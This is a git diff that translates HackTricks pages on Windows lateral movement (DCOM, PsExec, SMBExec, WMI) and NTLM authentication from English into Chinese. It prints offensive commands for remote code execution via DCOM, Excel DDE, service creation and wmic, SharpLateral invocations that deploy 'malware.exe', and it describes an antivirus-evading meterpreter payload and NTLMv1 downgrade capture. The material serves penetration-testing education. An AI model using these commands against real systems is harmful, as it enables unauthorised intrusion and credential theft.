+此命令连接到 DCOM 应用程序并返回 COM 对象的实例。然后可以调用 ExecuteShellCommand 方法在远程主机上执行进程。该过程涉及以下步骤：
 
-This command connects to the DCOM application and returns an instance of the COM object. The ExecuteShellCommand method can then be invoked to execute a process on the remote host. The process involves the following steps:
-
-Check methods:
-
+检查方法：
 ```powershell
 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
 $com.Document.ActiveView | Get-Member
 ```
-
-Get RCE:
-
+获取 RCE：
 ```powershell
 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
 $com | Get-Member
@@ -39,82 +32,72 @@ $com | Get-Member
 
 ls \\10.10.10.10\c$\Users
 ```
-
 ## ShellWindows & ShellBrowserWindow
 
-**For more info about this technique check the original post [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)**
+**有关此技术的更多信息，请查看原始帖子 [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)**
 
-The **MMC20.Application** object was identified to lack explicit "LaunchPermissions," defaulting to permissions that permit Administrators access. For further details, a thread can be explored [here](https://twitter.com/tiraniddo/status/817532039771525120), and the usage of [@tiraniddo](https://twitter.com/tiraniddo)’s OleView .NET for filtering objects without explicit Launch Permission is recommended.
+**MMC20.Application** 对象被识别为缺乏明确的 "LaunchPermissions"，默认为允许管理员访问的权限。有关更多详细信息，可以在 [这里](https://twitter.com/tiraniddo/status/817532039771525120) 探索一个线程，并建议使用 [@tiraniddo](https://twitter.com/tiraniddo) 的 OleView .NET 来过滤没有明确启动权限的对象。
 
-Two specific objects, `ShellBrowserWindow` and `ShellWindows`, were highlighted due to their lack of explicit Launch Permissions. The absence of a `LaunchPermission` registry entry under `HKCR:\AppID\{guid}` signifies no explicit permissions.
+两个特定对象，`ShellBrowserWindow` 和 `ShellWindows`，因缺乏明确的启动权限而被强调。`HKCR:\AppID\{guid}` 下缺少 `LaunchPermission` 注册表项表示没有明确的权限。
 
 ### ShellWindows
 
-For `ShellWindows`, which lacks a ProgID, the .NET methods `Type.GetTypeFromCLSID` and `Activator.CreateInstance` facilitate object instantiation using its AppID. This process leverages OleView .NET to retrieve the CLSID for `ShellWindows`. Once instantiated, interaction is possible through the `WindowsShell.Item` method, leading to method invocation like `Document.Application.ShellExecute`.
-
-Example PowerShell commands were provided to instantiate the object and execute commands remotely:
+对于缺乏 ProgID 的 `ShellWindows`，.NET 方法 `Type.GetTypeFromCLSID` 和 `Activator.CreateInstance` 通过其 AppID 促进对象实例化。此过程利用 OleView .NET 检索 `ShellWindows` 的 CLSID。一旦实例化，可以通过 `WindowsShell.Item` 方法进行交互，从而调用方法，如 `Document.Application.ShellExecute`。
 
+提供了示例 PowerShell 命令以实例化对象并远程执行命令：
 ```powershell
 $com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
 $obj = [System.Activator]::CreateInstance($com)
 $item = $obj.Item()
 $item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
 ```
-
 ### Lateral Movement with Excel DCOM Objects
 
-Lateral movement can be achieved by exploiting DCOM Excel objects. For detailed information, it's advisable to read the discussion on leveraging Excel DDE for lateral movement via DCOM at [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom).
-
-The Empire project provides a PowerShell script, which demonstrates the utilization of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available on [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1), showcasing different methods to abuse Excel for RCE:
+侧向移动可以通过利用 DCOM Excel 对象来实现。有关详细信息，建议阅读 [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) 上关于通过 DCOM 利用 Excel DDE 进行侧向移动的讨论。
 
+Empire 项目提供了一个 PowerShell 脚本，演示了通过操纵 DCOM 对象利用 Excel 进行远程代码执行 (RCE)。以下是来自 [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) 的脚本片段，展示了滥用 Excel 进行 RCE 的不同方法：
 ```powershell
 # Detection of Office version
 elseif ($Method -Match "DetectOffice") {
-    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
-    $Obj = [System.Activator]::CreateInstance($Com)
-    $isx64 = [boolean]$obj.Application.ProductCode[21]
-    Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
+$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+$Obj = [System.Activator]::CreateInstance($Com)
+$isx64 = [boolean]$obj.Application.ProductCode[21]
+Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
 }
 # Registration of an XLL
 elseif ($Method -Match "RegisterXLL") {
-    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
-    $Obj = [System.Activator]::CreateInstance($Com)
-    $obj.Application.RegisterXLL("$DllPath")
+$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+$Obj = [System.Activator]::CreateInstance($Com)
+$obj.Application.RegisterXLL("$DllPath")
 }
 # Execution of a command via Excel DDE
 elseif ($Method -Match "ExcelDDE") {
-    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
-    $Obj = [System.Activator]::CreateInstance($Com)
-    $Obj.DisplayAlerts = $false
-    $Obj.DDEInitiate("cmd", "/c $Command")
+$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+$Obj = [System.Activator]::CreateInstance($Com)
+$Obj.DisplayAlerts = $false
+$Obj.DDEInitiate("cmd", "/c $Command")
 }
 ```
+### 侧向移动的自动化工具
 
-### Automation Tools for Lateral Movement
+有两个工具被强调用于自动化这些技术：
 
-Two tools are highlighted for automating these techniques:
-
-- **Invoke-DCOM.ps1**: A PowerShell script provided by the Empire project that simplifies the invocation of different methods for executing code on remote machines. This script is accessible at the Empire GitHub repository.
-
-- **SharpLateral**: A tool designed for executing code remotely, which can be used with the command:
+- **Invoke-DCOM.ps1**：由Empire项目提供的PowerShell脚本，简化了在远程机器上执行代码的不同方法的调用。该脚本可以在Empire GitHub存储库中访问。
 
+- **SharpLateral**：一个用于远程执行代码的工具，可以使用以下命令：
 ```bash
 SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 ```
+## 自动化工具
 
-## Automatic Tools
-
-- The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) allows to easily invoke all the commented ways to execute code in other machines.
-- You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
-
+- Powershell 脚本 [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) 允许轻松调用所有注释的在其他机器上执行代码的方法。
+- 你也可以使用 [**SharpLateral**](https://github.com/mertdas/SharpLateral):
 ```bash
 SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 ```
-
-## References
+## 参考
 
 - [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)
 - [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
index 8f7c69ff6..c0c9aa34b 100644
--- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -4,40 +4,37 @@
 
 {% embed url="https://websec.nl/" %}
 
-## How do they work
+## 它们是如何工作的
 
-The process is outlined in the steps below, illustrating how service binaries are manipulated to achieve remote execution on a target machine via SMB:
+该过程在以下步骤中概述，说明如何通过 SMB 操纵服务二进制文件以实现对目标机器的远程执行：
 
-1. **Copying of a service binary to the ADMIN$ share over SMB** is performed.
-2. **Creation of a service on the remote machine** is done by pointing to the binary.
-3. The service is **started remotely**.
-4. Upon exit, the service is **stopped, and the binary is deleted**.
+1. **通过 SMB 复制服务二进制文件到 ADMIN$ 共享**。
+2. **在远程机器上创建服务**，指向该二进制文件。
+3. 服务被 **远程启动**。
+4. 退出时，服务被 **停止，二进制文件被删除**。
 
-### **Process of Manually Executing PsExec**
+### **手动执行 PsExec 的过程**
 
-Assuming there is an executable payload (created with msfvenom and obfuscated using Veil to evade antivirus detection), named 'met8888.exe', representing a meterpreter reverse_http payload, the following steps are taken:
+假设有一个可执行有效载荷（使用 msfvenom 创建并使用 Veil 混淆以规避防病毒检测），名为 'met8888.exe'，代表一个 meterpreter reverse_http 有效载荷，采取以下步骤：
 
-- **Copying the binary**: The executable is copied to the ADMIN$ share from a command prompt, though it may be placed anywhere on the filesystem to remain concealed.
-- **Creating a service**: Utilizing the Windows `sc` command, which allows for querying, creating, and deleting Windows services remotely, a service named "meterpreter" is created to point to the uploaded binary.
-- **Starting the service**: The final step involves starting the service, which will likely result in a "time-out" error due to the binary not being a genuine service binary and failing to return the expected response code. This error is inconsequential as the primary goal is the binary's execution.
+- **复制二进制文件**：可执行文件从命令提示符复制到 ADMIN$ 共享，尽管它可以放置在文件系统的任何位置以保持隐蔽。
+- **创建服务**：利用 Windows `sc` 命令，该命令允许远程查询、创建和删除 Windows 服务，创建一个名为 "meterpreter" 的服务，指向上传的二进制文件。
+- **启动服务**：最后一步涉及启动服务，这可能会导致 "超时" 错误，因为该二进制文件不是一个真正的服务二进制文件，未能返回预期的响应代码。此错误无关紧要，因为主要目标是执行该二进制文件。
 
-Observation of the Metasploit listener will reveal that the session has been initiated successfully.
+观察 Metasploit 监听器将显示会话已成功启动。
 
-[Learn more about the `sc` command](https://technet.microsoft.com/en-us/library/bb490995.aspx).
+[了解更多关于 `sc` 命令的信息](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
 
-Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+在这里找到更详细的步骤: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-**You could also use the Windows Sysinternals binary PsExec.exe:**
+**您还可以使用 Windows Sysinternals 二进制文件 PsExec.exe：**
 
 ![](<../../images/image (928).png>)
 
-You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
-
+您还可以使用 [**SharpLateral**](https://github.com/mertdas/SharpLateral)：
 ```
 SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
 ```
-
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/smbexec.md b/src/windows-hardening/lateral-movement/smbexec.md
index 138380f7b..2f5353620 100644
--- a/src/windows-hardening/lateral-movement/smbexec.md
+++ b/src/windows-hardening/lateral-movement/smbexec.md
@@ -4,54 +4,49 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用程序、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-## How it Works
+## 工作原理
 
-**Smbexec** is a tool used for remote command execution on Windows systems, similar to **Psexec**, but it avoids placing any malicious files on the target system.
+**Smbexec** 是一个用于在Windows系统上进行远程命令执行的工具，类似于 **Psexec**，但它避免在目标系统上放置任何恶意文件。
 
-### Key Points about **SMBExec**
-
-- It operates by creating a temporary service (for example, "BTOBTO") on the target machine to execute commands via cmd.exe (%COMSPEC%), without dropping any binaries.
-- Despite its stealthy approach, it does generate event logs for each command executed, offering a form of non-interactive "shell".
-- The command to connect using **Smbexec** looks like this:
+### 关于 **SMBExec** 的关键点
 
+- 它通过在目标机器上创建一个临时服务（例如，“BTOBTO”）来执行命令，通过cmd.exe (%COMSPEC%)，而不放置任何二进制文件。
+- 尽管采用隐蔽的方法，但它确实为每个执行的命令生成事件日志，提供了一种非交互式的“shell”形式。
+- 使用 **Smbexec** 连接的命令如下所示：
 ```bash
 smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 ```
+### 执行无二进制文件的命令
 
-### Executing Commands Without Binaries
+- **Smbexec** 通过服务 binPaths 直接执行命令，消除了在目标上需要物理二进制文件的需求。
+- 这种方法对于在 Windows 目标上执行一次性命令非常有用。例如，将其与 Metasploit 的 `web_delivery` 模块配对，可以执行针对 PowerShell 的反向 Meterpreter 有效载荷。
+- 通过在攻击者的机器上创建一个远程服务，并将 binPath 设置为通过 cmd.exe 运行提供的命令，可以成功执行有效载荷，实现回调和有效载荷执行与 Metasploit 监听器，即使发生服务响应错误。
 
-- **Smbexec** enables direct command execution through service binPaths, eliminating the need for physical binaries on the target.
-- This method is useful for executing one-time commands on a Windows target. For instance, pairing it with Metasploit's `web_delivery` module allows for the execution of a PowerShell-targeted reverse Meterpreter payload.
-- By creating a remote service on the attacker's machine with binPath set to run the provided command through cmd.exe, it's possible to execute the payload successfully, achieving callback and payload execution with the Metasploit listener, even if service response errors occur.
-
-### Commands Example
-
-Creating and starting the service can be accomplished with the following commands:
+### 命令示例
 
+创建和启动服务可以通过以下命令完成：
 ```bash
 sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
 sc start [ServiceName]
 ```
+有关更多详细信息，请查看 [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-FOr further details check [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
-
-## References
+## 参考文献
 
 - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度审视您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/winrm.md b/src/windows-hardening/lateral-movement/winrm.md
index 44cca4241..7232563a2 100644
--- a/src/windows-hardening/lateral-movement/winrm.md
+++ b/src/windows-hardening/lateral-movement/winrm.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-For information about [**WinRM read this page**](../../network-services-pentesting/5985-5986-pentesting-winrm.md).
+有关[**WinRM的信息，请阅读此页面**](../../network-services-pentesting/5985-5986-pentesting-winrm.md)。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/wmiexec.md b/src/windows-hardening/lateral-movement/wmiexec.md
index f893fbae1..5ce97f290 100644
--- a/src/windows-hardening/lateral-movement/wmiexec.md
+++ b/src/windows-hardening/lateral-movement/wmiexec.md
@@ -2,19 +2,18 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How It Works Explained
+## 工作原理解释
 
-Processes can be opened on hosts where the username and either password or hash are known through the use of WMI. Commands are executed using WMI by Wmiexec, providing a semi-interactive shell experience.
+可以在已知用户名和密码或哈希的主机上通过使用 WMI 打开进程。通过 Wmiexec 使用 WMI 执行命令，提供半交互式的 shell 体验。
 
-**dcomexec.py:** Utilizing different DCOM endpoints, this script offers a semi-interactive shell akin to wmiexec.py, specifically leveraging the ShellBrowserWindow DCOM object. It currently supports MMC20. Application, Shell Windows, and Shell Browser Window objects. (source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
+**dcomexec.py:** 利用不同的 DCOM 端点，该脚本提供类似于 wmiexec.py 的半交互式 shell，特别利用 ShellBrowserWindow DCOM 对象。它目前支持 MMC20。应用程序、Shell Windows 和 Shell Browser Window 对象。（来源：[Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)）
 
-## WMI Fundamentals
+## WMI 基础知识
 
-### Namespace
-
-Structured in a directory-style hierarchy, WMI's top-level container is \root, under which additional directories, referred to as namespaces, are organized.
-Commands to list namespaces:
+### 命名空间
 
+WMI 的顶级容器是 \root，按照目录式层次结构组织，下面有称为命名空间 的其他目录。
+列出命名空间的命令：
 ```bash
 # Retrieval of Root namespaces
 gwmi -namespace "root" -Class "__Namespace" | Select Name
@@ -25,36 +24,28 @@ Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | s
 # Listing of namespaces within "root\cimv2"
 Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
 ```
-
-Classes within a namespace can be listed using:
-
+可以使用以下命令列出命名空间中的类：
 ```bash
 gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
 gwmi -Namespace "root/microsoft" -List -Recurse
 ```
+### **类**
 
-### **Classes**
-
-Knowing a WMI class name, such as win32_process, and the namespace it resides in is crucial for any WMI operation.
-Commands to list classes beginning with `win32`:
-
+知道 WMI 类名，例如 win32_process，以及它所在的命名空间对于任何 WMI 操作都是至关重要的。  
+列出以 `win32` 开头的类的命令：
 ```bash
 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
 gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
 ```
-
-Invocation of a class:
-
+类的调用：
 ```bash
 # Defaults to "root/cimv2" when namespace isn't specified
 Get-WmiObject -Class win32_share
 Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
 ```
+### 方法
 
-### Methods
-
-Methods, which are one or more executable functions of WMI classes, can be executed.
-
+方法是一个或多个可执行的 WMI 类函数，可以被执行。
 ```bash
 # Class loading, method listing, and execution
 $c = [wmiclass]"win32_share"
@@ -66,13 +57,11 @@ $c.methods
 # Method listing and invocation
 Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
 ```
+## WMI 枚举
 
-## WMI Enumeration
-
-### WMI Service Status
-
-Commands to verify if the WMI service is operational:
+### WMI 服务状态
 
+验证 WMI 服务是否正常运行的命令：
 ```bash
 # WMI service status check
 Get-Service Winmgmt
@@ -80,18 +69,14 @@ Get-Service Winmgmt
 # Via CMD
 net start | findstr "Instrumentation"
 ```
+### 系统和进程信息
 
-### System and Process Information
-
-Gathering system and process information through WMI:
-
+通过 WMI 收集系统和进程信息：
 ```bash
 Get-WmiObject -ClassName win32_operatingsystem | select * | more
 Get-WmiObject win32_process | Select Name, Processid
 ```
-
-For attackers, WMI is a potent tool for enumerating sensitive data about systems or domains.
-
+对于攻击者来说，WMI 是一个强大的工具，用于枚举有关系统或域的敏感数据。
 ```bash
 wmic computerystem list full /format:list
 wmic process list /format:list
@@ -100,32 +85,26 @@ wmic useraccount list /format:list
 wmic group list /format:list
 wmic sysaccount list /format:list
 ```
+通过仔细构造命令，可以远程查询 WMI 以获取特定信息，例如本地管理员或登录用户。
 
-Remote querying of WMI for specific information, such as local admins or logged-on users, is feasible with careful command construction.
+### **手动远程 WMI 查询**
 
-### **Manual Remote WMI Querying**
-
-Stealthy identification of local admins on a remote machine and logged-on users can be achieved through specific WMI queries. `wmic` also supports reading from a text file to execute commands on multiple nodes simultaneously.
-
-To remotely execute a process over WMI, such as deploying an Empire agent, the following command structure is employed, with successful execution indicated by a return value of "0":
+可以通过特定的 WMI 查询隐秘地识别远程计算机上的本地管理员和登录用户。`wmic` 还支持从文本文件读取，以便同时在多个节点上执行命令。
 
+要通过 WMI 远程执行一个进程，例如部署 Empire 代理，使用以下命令结构，成功执行的返回值为 "0"：
 ```bash
 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 ```
+该过程展示了WMI远程执行和系统枚举的能力，突显了其在系统管理和渗透测试中的实用性。
 
-This process illustrates WMI's capability for remote execution and system enumeration, highlighting its utility for both system administration and penetration testing.
-
-## References
+## 参考
 
 - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-## Automatic Tools
+## 自动化工具
 
 - [**SharpLateral**](https://github.com/mertdas/SharpLateral):
-
 ```bash
 SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index c35fc4a55..4155fcd59 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -2,43 +2,40 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-In environments where **Windows XP and Server 2003** are in operation, LM (Lan Manager) hashes are utilized, although it's widely recognized that these can be easily compromised. A particular LM hash, `AAD3B435B51404EEAAD3B435B51404EE`, indicates a scenario where LM is not employed, representing the hash for an empty string.
+在运行 **Windows XP 和 Server 2003** 的环境中，使用 LM (Lan Manager) 哈希，尽管广泛认为这些哈希容易被破解。一个特定的 LM 哈希 `AAD3B435B51404EEAAD3B435B51404EE` 表示未使用 LM，代表一个空字符串的哈希。
 
-By default, the **Kerberos** authentication protocol is the primary method used. NTLM (NT LAN Manager) steps in under specific circumstances: absence of Active Directory, non-existence of the domain, malfunctioning of Kerberos due to improper configuration, or when connections are attempted using an IP address rather than a valid hostname.
+默认情况下，**Kerberos** 认证协议是主要使用的方法。NTLM (NT LAN Manager) 在特定情况下介入：缺少 Active Directory、域不存在、由于配置不当导致 Kerberos 故障，或在尝试使用 IP 地址而不是有效主机名进行连接时。
 
-The presence of the **"NTLMSSP"** header in network packets signals an NTLM authentication process.
+网络数据包中存在 **"NTLMSSP"** 头部信号表示 NTLM 认证过程。
 
-Support for the authentication protocols - LM, NTLMv1, and NTLMv2 - is facilitated by a specific DLL located at `%windir%\Windows\System32\msv1\_0.dll`.
+对认证协议 - LM、NTLMv1 和 NTLMv2 - 的支持由位于 `%windir%\Windows\System32\msv1\_0.dll` 的特定 DLL 提供。
 
-**Key Points**:
+**关键点**：
 
-- LM hashes are vulnerable and an empty LM hash (`AAD3B435B51404EEAAD3B435B51404EE`) signifies its non-use.
-- Kerberos is the default authentication method, with NTLM used only under certain conditions.
-- NTLM authentication packets are identifiable by the "NTLMSSP" header.
-- LM, NTLMv1, and NTLMv2 protocols are supported by the system file `msv1\_0.dll`.
+- LM 哈希易受攻击，空 LM 哈希 (`AAD3B435B51404EEAAD3B435B51404EE`) 表示未使用。
+- Kerberos 是默认的认证方法，NTLM 仅在特定条件下使用。
+- NTLM 认证数据包可通过 "NTLMSSP" 头部识别。
+- LM、NTLMv1 和 NTLMv2 协议由系统文件 `msv1\_0.dll` 支持。
 
-## LM, NTLMv1 and NTLMv2
+## LM、NTLMv1 和 NTLMv2
 
-You can check and configure which protocol will be used:
+您可以检查和配置将使用哪个协议：
 
 ### GUI
 
-Execute _secpol.msc_ -> Local policies -> Security Options -> Network Security: LAN Manager authentication level. There are 6 levels (from 0 to 5).
+执行 _secpol.msc_ -> 本地策略 -> 安全选项 -> 网络安全：LAN Manager 认证级别。有 6 个级别（从 0 到 5）。
 
 ![](<../../images/image (919).png>)
 
-### Registry
-
-This will set the level 5:
+### 注册表
 
+这将设置级别 5：
 ```
 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
 ```
-
-Possible values:
-
+可能的值：
 ```
 0 - Send LM & NTLM responses
 1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
@@ -47,58 +44,54 @@ Possible values:
 4 - Send NTLMv2 response only, refuse LM
 5 - Send NTLMv2 response only, refuse LM & NTLM
 ```
+## 基本 NTLM 域认证方案
 
-## Basic NTLM Domain authentication Scheme
+1. **用户**输入他的 **凭据**
+2. 客户端机器 **发送认证请求**，发送 **域名** 和 **用户名**
+3. **服务器**发送 **挑战**
+4. **客户端使用**密码的哈希作为密钥 **加密** **挑战** 并将其作为响应发送
+5. **服务器将** **域名、用户名、挑战和响应** 发送给 **域控制器**。如果 **没有** 配置 Active Directory 或域名是服务器的名称，则凭据 **在本地检查**。
+6. **域控制器检查一切是否正确** 并将信息发送给服务器
 
-1. The **user** introduces his **credentials**
-2. The client machine **sends an authentication request** sending the **domain name** and the **username**
-3. The **server** sends the **challenge**
-4. The **client encrypts** the **challenge** using the hash of the password as key and sends it as response
-5. The **server sends** to the **Domain controller** the **domain name, the username, the challenge and the response**. If there **isn't** an Active Directory configured or the domain name is the name of the server, the credentials are **checked locally**.
-6. The **domain controller checks if everything is correct** and sends the information to the server
+**服务器**和 **域控制器**能够通过 **Netlogon** 服务器创建 **安全通道**，因为域控制器知道服务器的密码（它在 **NTDS.DIT** 数据库中）。
 
-The **server** and the **Domain Controller** are able to create a **Secure Channel** via **Netlogon** server as the Domain Controller know the password of the server (it is inside the **NTDS.DIT** db).
+### 本地 NTLM 认证方案
 
-### Local NTLM authentication Scheme
+认证与之前提到的 **相同，但** **服务器**知道尝试在 **SAM** 文件中进行身份验证的 **用户的哈希**。因此，服务器将 **自行检查** 用户是否可以进行身份验证，而不是询问域控制器。
 
-The authentication is as the one mentioned **before but** the **server** knows the **hash of the user** that tries to authenticate inside the **SAM** file. So, instead of asking the Domain Controller, the **server will check itself** if the user can authenticate.
+### NTLMv1 挑战
 
-### NTLMv1 Challenge
+**挑战长度为 8 字节**，**响应长度为 24 字节**。
 
-The **challenge length is 8 bytes** and the **response is 24 bytes** long.
+**哈希 NT (16 字节)** 被分为 **3 个部分，每个部分 7 字节**（7B + 7B + (2B+0x00\*5)）：**最后一部分用零填充**。然后，**挑战**与每个部分 **单独加密**，**结果**的加密字节被 **连接**。总计：8B + 8B + 8B = 24 字节。
 
-The **hash NT (16bytes)** is divided in **3 parts of 7bytes each** (7B + 7B + (2B+0x00\*5)): the **last part is filled with zeros**. Then, the **challenge** is **ciphered separately** with each part and the **resulting** ciphered bytes are **joined**. Total: 8B + 8B + 8B = 24Bytes.
+**问题**：
 
-**Problems**:
+- 缺乏 **随机性**
+- 3 个部分可以 **单独攻击** 以找到 NT 哈希
+- **DES 可破解**
+- 第 3 个密钥始终由 **5 个零** 组成。
+- 给定 **相同的挑战**，**响应**将是 **相同的**。因此，您可以将字符串 "**1122334455667788**" 作为 **挑战** 提供给受害者，并使用 **预计算的彩虹表** 攻击响应。
 
-- Lack of **randomness**
-- The 3 parts can be **attacked separately** to find the NT hash
-- **DES is crackable**
-- The 3º key is composed always by **5 zeros**.
-- Given the **same challenge** the **response** will be **same**. So, you can give as a **challenge** to the victim the string "**1122334455667788**" and attack the response used **precomputed rainbow tables**.
+### NTLMv1 攻击
 
-### NTLMv1 attack
+如今，发现配置了不受限制委派的环境变得越来越少，但这并不意味着您不能 **滥用配置的打印后台处理程序服务**。
 
-Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't **abuse a Print Spooler service** configured.
+您可以滥用您在 AD 上已经拥有的一些凭据/会话，以 **请求打印机进行身份验证**，针对某个 **在您控制下的主机**。然后，使用 `metasploit auxiliary/server/capture/smb` 或 `responder`，您可以 **将认证挑战设置为 1122334455667788**，捕获认证尝试，如果使用 **NTLMv1** 进行，您将能够 **破解它**。\
+如果您使用 `responder`，您可以尝试 \*\*使用标志 `--lm` \*\* 来尝试 **降级** **认证**。\
+&#xNAN;_&#x4E;请注意，对于此技术，认证必须使用 NTLMv1 进行（NTLMv2 无效）。_
 
-You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.\
-If you are using `responder` you could try to \*\*use the flag `--lm` \*\* to try to **downgrade** the **authentication**.\
-&#xNAN;_&#x4E;ote that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
